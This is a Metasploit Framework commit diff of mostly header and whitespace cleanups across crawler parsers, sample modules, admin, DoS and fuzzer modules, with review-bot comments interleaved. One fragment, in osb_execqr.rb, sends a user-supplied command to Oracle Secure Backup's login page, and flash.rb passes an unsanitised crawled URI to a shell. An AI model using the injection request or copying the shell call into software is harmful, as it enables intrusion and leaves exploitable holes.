more cleanups

git-svn-id: file:///home/svn/framework3/trunk@9212 4d416f70-5f16-0410-b530-b9f4589650da
commit 0e72894e583d3a64c993cda90ffb25c2efb77686 1 parent df9ec8a
@jduck jduck authored
Showing with 1,484 additions and 943 deletions.
  1. +22 −9 data/msfcrawler/basic.rb
  2. +33 −21 data/msfcrawler/flash.rb
  3. +33 −20 data/msfcrawler/forms.rb
  4. +20 −7 data/msfcrawler/objects.rb
  5. +21 −8 data/msfcrawler/scripts.rb
  6. +4 −0 documentation/samples/framework/dump_module_info.rb
  7. +4 −0 documentation/samples/framework/encode_file.rb
  8. +4 −0 documentation/samples/framework/enumerate_modules.rb
  9. +4 −0 documentation/samples/framework/run_exploit_using_base.rb
  10. +4 −0 documentation/samples/framework/run_exploit_using_core.rb
  11. +3 −4 documentation/samples/modules/auxiliary/sample.rb
  12. +13 −2 documentation/samples/modules/encoders/sample.rb
  13. +17 −3 documentation/samples/modules/exploits/sample.rb
  14. +11 −0 documentation/samples/modules/nops/sample.rb
  15. +13 −2 documentation/samples/modules/payloads/singles/sample.rb
  16. +4 −1 modules/auxiliary/admin/http/tomcat_administration.rb
  17. +12 −1 modules/auxiliary/admin/motorola/wr850g_cred.rb
  18. +1 −1  modules/auxiliary/admin/oracle/oracle_sql.rb
  19. +8 −4 modules/auxiliary/admin/oracle/osb_execqr.rb
  20. +5 −5 modules/auxiliary/dos/wifi/cts_rts_flood.rb
  21. +14 −3 modules/auxiliary/dos/wifi/file2air.rb
  22. +1 −3 modules/auxiliary/dos/wifi/netgear_ma521_rates.rb
  23. +3 −6 modules/auxiliary/dos/wifi/netgear_wg311pci.rb
  24. +14 −3 modules/auxiliary/dos/windows/http/pi3web_isapi.rb
  25. +12 −12 modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb
  26. +9 −9 modules/auxiliary/fuzzers/smb/smb_create_pipe.rb
  27. +19 −19 modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb
  28. +12 −12 modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb
  29. +18 −18 modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
  30. +13 −13 modules/auxiliary/fuzzers/ssh/ssh_version_15.rb
  31. +13 −13 modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
  32. +13 −13 modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb
  33. +31 −31 modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb
  34. +30 −30 modules/auxiliary/fuzzers/tds/tds_login_username.rb
  35. +20 −15 modules/auxiliary/gather/dns_enum.rb
  36. +16 −12 modules/auxiliary/gather/search_email_collector.rb
  37. +4 −2 modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb
  38. +18 −8 modules/auxiliary/scanner/dect/call_scanner.rb
  39. +21 −11 modules/auxiliary/scanner/dect/station_scanner.rb
  40. +4 −2 modules/auxiliary/scanner/finger/finger_users.rb
  41. +4 −2 modules/auxiliary/scanner/ftp/ftp_version.rb
  42. +3 −2 modules/auxiliary/scanner/http/cert.rb
  43. +6 −4 modules/auxiliary/scanner/http/enum_delicious.rb
  44. +1 −1  modules/auxiliary/scanner/http/enum_wayback.rb
  45. +8 −3 modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
  46. +4 −3 modules/auxiliary/scanner/http/options.rb
  47. +12 −3 modules/auxiliary/scanner/http/sqlmap.rb
  48. +3 −1 modules/auxiliary/scanner/http/ssl.rb
  49. +5 −3 modules/auxiliary/scanner/http/svn_scanner.rb
  50. +1 −3 modules/auxiliary/scanner/http/trace_axd.rb
  51. +5 −2 modules/auxiliary/scanner/http/web_vulndb.rb
  52. +4 −0 modules/auxiliary/scanner/imap/imap_version.rb
  53. +4 −5 modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
  54. +3 −3 modules/auxiliary/scanner/nfs/nfsmount.rb
  55. +1 −1  modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
  56. +4 −0 modules/auxiliary/scanner/pop3/pop3_version.rb
  57. +4 −0 modules/auxiliary/scanner/smtp/smtp_version.rb
  58. +4 −2 modules/auxiliary/scanner/telnet/telnet_version.rb
  59. +3 −3 modules/auxiliary/scanner/x11/open_x11.rb
  60. +2 −5 modules/auxiliary/server/capture/ftp.rb
  61. +2 −0  modules/auxiliary/server/capture/http_ntlm.rb
  62. +11 −0 modules/auxiliary/server/capture/telnet.rb
  63. +1 −3 modules/auxiliary/server/file_autopwn.rb
  64. +0 −1  modules/auxiliary/spoof/dns/bailiwicked_domain.rb
  65. +40 −30 modules/auxiliary/spoof/dns/compare_results.rb
  66. +1 −1  modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb
  67. +1 −1  modules/auxiliary/sqli/oracle/dbms_export_extension.rb
  68. +9 −6 modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb
  69. +9 −6 modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb
  70. +2 −6 modules/encoders/x86/alpha_mixed.rb
  71. +3 −3 modules/exploits/multi/fileformat/maple_maplet.rb
  72. +1 −0  modules/exploits/multi/ftp/wuftpd_site_exec_format.rb
  73. +2 −3 modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb
  74. +3 −0  modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb
  75. +10 −1 modules/exploits/solaris/sunrpc/ypupdated_exec.rb
  76. +2 −2 modules/exploits/unix/webapp/guestbook_ssi_exec.rb
  77. +8 −6 modules/exploits/windows/backdoor/energizer_duo_payload.rb
  78. +17 −14 modules/exploits/windows/browser/adobe_jbig2decode.rb
  79. +12 −8 modules/exploits/windows/browser/adobe_utilprintf.rb
  80. +21 −21 modules/exploits/windows/browser/ms09_043_owc_msdso.rb
  81. +1 −1  modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
  82. +10 −6 modules/exploits/windows/fileformat/adobe_jbig2decode.rb
  83. +7 −4 modules/exploits/windows/fileformat/mediajukebox.rb
  84. +2 −2 modules/exploits/windows/fileformat/mymp3player_m3u.rb
  85. +1 −0  modules/exploits/windows/ftp/vermillion_ftpd_port.rb
  86. +1 −0  modules/exploits/windows/http/bea_weblogic_jsessionid.rb
  87. +1 −0  modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
  88. +1 −1  modules/exploits/windows/http/hp_nnm_ovwebhelp.rb
  89. +1 −0  modules/exploits/windows/http/httpdx_handlepeer.rb
  90. +1 −0  modules/exploits/windows/http/httpdx_tolog_format.rb
  91. +11 −1 modules/payloads/singles/linux/x86/chmod.rb
  92. +0 −2  modules/payloads/singles/linux/x86/exec.rb
  93. +0 −2  modules/payloads/singles/windows/exec.rb
  94. +11 −0 modules/payloads/stagers/osx/x86/bind_tcp.rb
  95. +4 −0 modules/payloads/stages/netware/shell.rb
  96. +0 −2  modules/payloads/stages/osx/x86/bundleinject.rb
  97. +11 −2 modules/payloads/stages/windows/dllinject.rb
  98. +1 −3 modules/payloads/stages/windows/patchupdllinject.rb
  99. +11 −0 modules/payloads/stages/windows/vncinject.rb
  100. +5 −5 modules/payloads/stages/windows/x64/vncinject.rb
  101. +21 −17 msfcli
  102. +6 −2 msfconsole
  103. +4 −0 msfd
  104. +3 −1 msfelfscan
  105. +4 −0 msfencode
  106. +4 −0 msfgui
  107. +4 −0 msfmachscan
  108. +4 −0 msfopcode
  109. +4 −0 msfpayload
  110. +4 −0 msfpescan
  111. +6 −2 msfrpc
  112. +7 −3 msfrpcd
  113. +4 −0 msfweb
  114. +5 −0 plugins/auto_add_route.rb
  115. +7 −0 plugins/db_credcollect.rb
  116. +4 −0 plugins/db_mysql.rb
  117. +4 −0 plugins/db_postgres.rb
  118. +4 −0 plugins/db_sqlite2.rb
  119. +4 −0 plugins/db_sqlite3.rb
  120. +12 −7 plugins/db_tracker.rb
  121. +17 −12 plugins/db_wmap.rb
  122. +4 −0 plugins/event_tester.rb
  123. +15 −10 plugins/ips_filter.rb
  124. +4 −0 plugins/msfd.rb
  125. +4 −0 plugins/nexpose.rb
  126. +9 −7 plugins/pcap_log.rb
  127. +8 −3 plugins/sample.rb
  128. +5 −0 plugins/session_tagger.rb
  129. +15 −10 plugins/socket_logger.rb
  130. +5 −0 plugins/sounds.rb
  131. +12 −7 plugins/thread.rb
  132. +5 −0 plugins/token_hunter.rb
  133. +21 −17 plugins/xmlrpc.rb
  134. +3 −3 scripts/meterpreter/checkvm.rb
  135. +13 −13 scripts/meterpreter/getcountermeasure.rb
  136. +2 −2 scripts/meterpreter/getgui.rb
  137. +2 −2 scripts/meterpreter/gettelnet.rb
  138. +2 −2 scripts/meterpreter/hostsedit.rb
  139. +2 −2 scripts/meterpreter/killav.rb
  140. +2 −2 scripts/meterpreter/migrate.rb
  141. +9 −4 scripts/meterpreter/multi_console_command.rb
  142. +1 −1  scripts/meterpreter/multicommand.rb
  143. +2 −2 scripts/meterpreter/multiscript.rb
  144. +2 −2 scripts/meterpreter/netenum.rb
  145. +12 −12 scripts/meterpreter/prefetchtool.rb
  146. +5 −5 scripts/meterpreter/remotewinenum.rb
  147. +3 −3 scripts/meterpreter/search_dwld.rb
  148. +11 −11 scripts/meterpreter/winbf.rb
  149. +3 −3 scripts/meterpreter/winenum.rb
  150. +6 −6 test/tests/03_range_walker_test.rb
  151. +7 −3 tools/convert_31.rb
  152. +4 −0 tools/exe2vba.rb
  153. +4 −0 tools/exe2vbs.rb
  154. +4 −0 tools/find_badchars.rb
  155. +4 −0 tools/halflm_second.rb
  156. +36 −32 tools/import_webscarab.rb
  157. +4 −0 tools/lm2ntcrack.rb
  158. +5 −0 tools/metasm_shell.rb
  159. +7 −4 tools/module_author.rb
  160. +7 −3 tools/module_license.rb
  161. +4 −0 tools/module_ports.rb
  162. +4 −0 tools/module_reference.rb
  163. +2 −0  tools/module_targets.rb
  164. +4 −0 tools/msf_irb_shell.rb
  165. +134 −131 tools/msfcrawler.rb
  166. +87 −84 tools/msfproxy.rb
  167. +4 −0 tools/nasm_shell.rb
  168. +5 −1 tools/pattern_create.rb
  169. +2 −0  tools/pattern_offset.rb
31 data/msfcrawler/basic.rb
@@ -1,3 +1,16 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,28 +19,28 @@
class CrawlerSimple < BaseParser
def parse(request,result)
-
+
if !result['Content-Type'].include? "text/html"
return
end
-
+
doc = Hpricot(result.body.to_s)
doc.search('a').each do |link|
-
+
hr = link.attributes['href']
-
- if hr and !hr.match(/^(\#|javascript\:)/)
+
+ if hr and !hr.match(/^(\#|javascript\:)/)
begin
- hreq = urltohash('GET',hr,request['uri'],nil)
-
+ hreq = urltohash('GET',hr,request['uri'],nil)
+
insertnewpath(hreq)
-
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
- end
+ end
end
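Review bot: `result['Content-Type'].include? "text/html"` at the top of `parse` raises NoMethodError when the response carries no Content-Type header, because `nil` has no `include?`; every crawler parser in this commit (flash.rb, forms.rb, objects.rb, scripts.rb) opens with the same line, so the check should be nil-safe, e.g. `return unless result['Content-Type'].to_s.include?("text/html")`. Whether `result['Content-Type']` can actually be nil depends on the response object, which is defined outside this file. The anchor/javascript filter `hr.match(/^(\#|javascript\:)/)` uses `^`, which in Ruby matches at the start of any line, so an href whose first line is harmless but whose second line begins with `javascript:` still passes; `\A` anchors to the start of the string only.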
54 data/msfcrawler/flash.rb
@@ -1,8 +1,20 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'uri'
-
$flarebinary = "/home/et/Downloads/flare"
$flareoutdir = "/home/et/Downloads/"
@@ -13,52 +25,52 @@ def parse(request,result)
rexp = ['loadMovieNum\(\'(.*?)\'',
'loadMovie\(\'(.*?)\'',
'getURL\(\'(.*?)\''
- ]
+ ]
+
-
if !result['Content-Type'].include? "application/x-shockwave-flash"
return
end
-
+
outswf = File.join($flareoutdir,request['uri'].gsub(/\//,'_'))
-
- puts "Downloading SWF file to: #{outswf}"
-
- ffile = File.new(outswf, "wb")
+
+ puts "Downloading SWF file to: #{outswf}"
+
+ ffile = File.new(outswf, "wb")
ffile.puts(result.body)
- ffile.close
+ ffile.close
system("#{$flarebinary} #{outswf}")
-
+
outflr = outswf.gsub('.swf','.flr')
-
+
if File.exists?(outflr)
- puts "Decompiled SWF file to: #{outflr}"
+ puts "Decompiled SWF file to: #{outflr}"
else
puts "Error: Decompilation failed."
return
end
-
+
File.open(outflr, "r") do |infile|
while (line = infile.gets)
- rexp.each do |r|
- links = line.to_s.scan(Regexp.new(r,true)) #"
- links.each do |link|
-
+ rexp.each do |r|
+ links = line.to_s.scan(Regexp.new(r,true)) #"
+ links.each do |link|
+
begin
hreq = urltohash('GET',link[0],request['uri'],nil)
insertnewpath(hreq)
-
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
- end
+ end
end
end
- end
- end
+ end
+ end
end
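Review bot: `system("#{$flarebinary} #{outswf}")` hands a string built from `request['uri']` to a shell; `outswf` only has slashes replaced, so any shell metacharacter in a crawled URI is interpreted by `/bin/sh` on the host running the crawler. The multi-argument form `system($flarebinary, outswf)` runs the decompiler without a shell and removes that exposure; the hunk re-indents this region but leaves the call unchanged. `File.new(outswf, "wb")` with a manual `close` is not closed if `puts` raises, and `puts` appends a newline to the binary SWF body — `File.open(outswf, "wb") { |f| f.write(result.body) }` handles both. `File.exists?` is the deprecated alias of `File.exist?`. The enclosing `parse` begins before this hunk.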
53 data/msfcrawler/forms.rb
@@ -1,3 +1,16 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@
class CrawlerForms < BaseParser
def parse(request,result)
-
+
if !result['Content-Type'].include? "text/html"
return
end
-
+
hr = ''
m = ''
@@ -21,44 +34,44 @@ def parse(request,result)
fname = f.attributes['name']
if fname.empty?
fname = "NONE"
- end
+ end
m = "GET"
if !f.attributes['method'].empty?
m = f.attributes['method'].upcase
end
-
- #puts "Parsing form name: #{fname} (#{m})"
-
+
+ #puts "Parsing form name: #{fname} (#{m})"
+
htmlform = Hpricot(f.inner_html)
-
+
arrdata = []
-
+
htmlform.search('input').each do |p|
#puts p.attributes['name']
#puts p.attributes['type']
#puts p.attributes['value']
-
- #raw_request has uri_encoding disabled as it encodes '='.
- arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
+
+ #raw_request has uri_encoding disabled as it encodes '='.
+ arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
end
-
+
data = arrdata.join("&").to_s
-
-
+
+
begin
hreq = urltohash(m,hr,request['uri'],data)
-
+
hreq['ctype'] = 'application/x-www-form-urlencoded'
-
+
insertnewpath(hreq)
-
-
+
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
- end
- end
+ end
+ end
end
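Review bot: `arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))` assumes every `<input>` has both attributes; for an input without `name` or `value` the visible code supplies no default, so the lookup presumably yields nil and `+` raises NoMethodError, aborting parsing of the whole form. Writing it as `arrdata << "#{p.attributes['name']}=#{Rex::Text.uri_encode(p.attributes['value'].to_s)}"` degrades to an empty name or value instead; `fname.empty?` and `f.attributes['method'].empty?` earlier in the hunk have the same exposure. The name is also not encoded while the value is, so a name containing `&` or `=` corrupts the body. The commented `#puts "Error: #{link[0]}"` in the rescue refers to `link`, which does not exist in this file — a leftover from basic.rb. The enclosing `parse` begins before this hunk.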
27 data/msfcrawler/objects.rb
@@ -1,3 +1,16 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@
class CrawlerObjects < BaseParser
def parse(request,result)
-
+
if !result['Content-Type'].include? "text/html"
return
end
-
+
hr = ''
m = ''
@@ -21,15 +34,15 @@ def parse(request,result)
begin
hreq = urltohash('GET',s,request['uri'],nil)
-
+
insertnewpath(hreq)
-
-
+
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
- end
- end
+ end
+ end
end
29 data/msfcrawler/scripts.rb
@@ -1,3 +1,16 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+# $Revision$
+
require 'rubygems'
require 'pathname'
require 'hpricot'
@@ -6,11 +19,11 @@
class CrawlerScripts < BaseParser
def parse(request,result)
-
+
if !result['Content-Type'].include? "text/html"
return
end
-
+
hr = ''
m = ''
@@ -20,16 +33,16 @@ def parse(request,result)
s = obj['src']
begin
- hreq = urltohash('GET',s,request['uri'],nil)
-
+ hreq = urltohash('GET',s,request['uri'],nil)
+
insertnewpath(hreq)
-
-
+
+
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
- end
- end
+ end
+ end
end
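Review bot: `urltohash('GET',s,request['uri'],nil)` is called with `s = obj['src']` unguarded, whereas basic.rb checks `if hr` before using the href; a `<script>` element with no `src` passes nil into `urltohash`, and only `URI::InvalidURIError` is rescued. A `next unless s` before the `begin` keeps the loop going for the remaining elements. objects.rb appears to have the same shape, though where its `s` comes from is outside that hunk. The enclosing `parse` begins before this hunk.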
4 documentation/samples/framework/dump_module_info.rb
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates how a module's information can be easily serialized
# to a readable format.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
4 documentation/samples/framework/encode_file.rb
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates how a file can be encoded using a framework
# encoder.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
4 documentation/samples/framework/enumerate_modules.rb
@@ -1,8 +1,12 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates enumerating all of the modules in the framework and
# displays their module type and reference name.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
4 documentation/samples/framework/run_exploit_using_base.rb
@@ -1,9 +1,13 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates using the framework core directly to launch an
# exploit. It makes use of the simplified exploit wrapper method provided by
# the Msf::Simple::Exploit mixin.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
4 documentation/samples/framework/run_exploit_using_core.rb
@@ -1,10 +1,14 @@
#!/usr/bin/env ruby
#
+# $Id$
+#
# This sample demonstrates using the framework core directly to launch an
# exploit. It uses the framework base Framework class so that the
# distribution module path is automatically set, but relies strictly on
# framework core classes for everything else.
#
+# $Revision$
+#
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
7 documentation/samples/modules/auxiliary/sample.rb
@@ -1,15 +1,14 @@
##
-# $Id: test.rb 4419 2007-02-18 00:10:39Z hdm $
+# $Id$
##
##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
-
require 'msf/core'
module Msf
@@ -49,7 +48,7 @@ def auxiliary_commands
def cmd_aux_extra_command(*args)
print_status("Running inside aux_extra_command()")
end
-
+
end
end
15 documentation/samples/modules/encoders/sample.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
module Msf
module Encoders
@@ -28,7 +39,7 @@ def encode_block(state, buf)
buf
end
-end
+end
-end
+end
end
20 documentation/samples/modules/exploits/sample.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
module Msf
@@ -19,20 +30,23 @@ def initialize(info = {})
super(update_info(info,
'Name' => 'Sample exploit',
'Description' => %q{
- This exploit module illustrates how a vulnerability could be exploited
+ This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a parsing bug.
},
'Author' => 'skape',
'Version' => '$Revision$',
+ 'References' =>
+ [
+ ],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
},
- 'Targets' =>
+ 'Targets' =>
[
# Target 0: Windows All
- [
+ [
'Windows Universal',
{
'Platform' => 'win',
11 documentation/samples/modules/nops/sample.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
module Msf
15 documentation/samples/modules/payloads/singles/sample.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
module Msf
@@ -30,6 +41,6 @@ def initialize(info = {})
end
-end
-end
+end
+end
end
5 modules/auxiliary/admin/http/tomcat_administration.rb
@@ -1,11 +1,14 @@
##
+# $Id$
+##
+
+##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
-
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
13 modules/auxiliary/admin/motorola/wr850g_cred.rb
@@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@@ -8,7 +19,7 @@ def initialize(info = {})
super(update_info(info,
'Name' => 'Motorola WR850G v4.03 Credentials',
'Description' => %q{
- Login credentials to the Motorola WR850G router with
+ Login credentials to the Motorola WR850G router with
firmware v4.03 can be obtained via a simple GET request
if issued while the administrator is logged in. A lot
more information is available through this request, but
2  modules/auxiliary/admin/oracle/oracle_sql.rb
@@ -25,7 +25,7 @@ def initialize(info = {})
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
- 'Version' => '$Revision: 7688 $',
+ 'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],
12 modules/auxiliary/admin/oracle/osb_execqr.rb
@@ -1,4 +1,8 @@
##
+# $Id$
+##
+
+##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
@@ -44,14 +48,14 @@ def run
cmd = datastore['CMD']
uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool="
-
+
req = uri + Rex::Text.uri_encode(cmd)
-
+
print_status("Sending command: #{datastore['CMD']}...")
res = send_request_raw({'uri' => req,},5)
-
+
print_status("Done.")
-
+
end
end
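Review bot: `res = send_request_raw({'uri' => req,},5)` stores the response but `run` prints "Done." unconditionally, so a timeout (presumably a nil return from `send_request_raw`) or an error page is reported exactly like a success. Branch on the result, e.g. `res ? print_status("Done.") : print_error("No response from the server")`, or at least surface `res.code` when a response arrives. The enclosing `run` begins before this hunk.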
10 modules/auxiliary/dos/wifi/cts_rts_flood.rb
@@ -20,14 +20,14 @@ def initialize(info ={})
super(update_info(info,
'Name' => 'Wireless CTS/RTS Flooder',
'Description' => %q{
- This module sends 802.11 CTS/RTS requests to a specific wireless peer,
- using the specified source address,
- },
-
+ This module sends 802.11 CTS/RTS requests to a specific wireless peer,
+ using the specified source address,
+ },
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
- ))
+ ))
+
register_options(
[
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
17 modules/auxiliary/dos/wifi/file2air.rb
@@ -1,15 +1,26 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Frame (File) Injector',
'Description' => %q{
- Inspired by Josh Wright's file2air, this module writes
+ Inspired by Josh Wright's file2air, this module writes
wireless frames from a binary file to the air, allowing
you to substitute some addresses before it gets sent.
Unlike the original file2air (currently v1.1), this module
@@ -62,7 +73,7 @@ def run
end
close_wifi
- end
+ end
def substaddrs(frame)
tods = (frame[1] & 1) == 1
4 modules/auxiliary/dos/wifi/netgear_ma521_rates.rb
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
-
require 'msf/core'
-
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
@@ -35,8 +33,8 @@ def initialize(info = {})
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
-
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
+ 'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
[
9 modules/auxiliary/dos/wifi/netgear_wg311pci.rb
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
-
require 'msf/core'
-
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
@@ -32,18 +30,17 @@ def initialize(info = {})
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
-
},
-
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
+ 'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
- [
+ [
['CVE', '2006-6125'],
['OSVDB', '30511'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
- ]
+ ]
))
register_options(
[
17 modules/auxiliary/dos/windows/http/pi3web_isapi.rb
@@ -1,12 +1,23 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
-
+
def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
'Name' => 'Pi3Web <=2.0.13 ISAPI DoS',
'Description' => %q{
The Pi3Web HTTP server crashes when a request is made
@@ -39,7 +50,7 @@ def run
print_status("Request sent to #{rhost}:#{rport}")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
- rescue ::Timeout::Error, ::Errno::EPIPE
+ rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
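Review bot: the `rescue ::Timeout::Error, ::Errno::EPIPE` arm at the end of `run` has an empty body, so the outcome a DoS module most needs to report — the connection dropping or timing out after the request was sent — is silently swallowed, while the refused/unreachable arm just above it prints a status. Give it a line of its own: `print_status("Connection dropped or timed out: #{rhost}:#{rport}")`. `run` begins before this hunk.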
24 modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Negotiate SMB2 Dialect Corruption',
@@ -33,7 +33,7 @@ def initialize(info = {})
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
-
+
def do_smb_negotiate(pkt,opts={})
@connected = false
connect
@@ -41,27 +41,27 @@ def do_smb_negotiate(pkt,opts={})
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
pkt = make_smb_negotiate
cnt = 0
-
+
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
print_status("Fuzzing SMB negotiate packet with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
-
+
